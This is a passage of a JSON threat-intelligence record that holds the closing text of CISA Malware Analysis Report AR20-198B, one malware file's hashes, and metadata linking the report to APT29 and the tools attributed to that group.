for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nRevisions\r\nJuly 16, 2020: Initial Version\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 44 of 44\n\nName Size 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb 6900178 bytes  \nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\nMD5 3a9cdd8a5cbc3ab10ad64c4bb641b41f  \nSHA1 e45f89c923d0361ce8f9c64a63031860a76b2d10  \n  Page 16 of 44",
	"extraction_quality": 1,
	"language": "NL",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b"
	],
	"report_names": [
		"ar20-198b"
	],
	"threat_actors": [
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434690,
	"ts_updated_at": 1775792236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5efc88b09fcecce99d033cb200a80dcf53584f3b.pdf",
		"text": "https://archive.orkl.eu/5efc88b09fcecce99d033cb200a80dcf53584f3b.txt",
		"img": "https://archive.orkl.eu/5efc88b09fcecce99d033cb200a80dcf53584f3b.jpg"
	}
}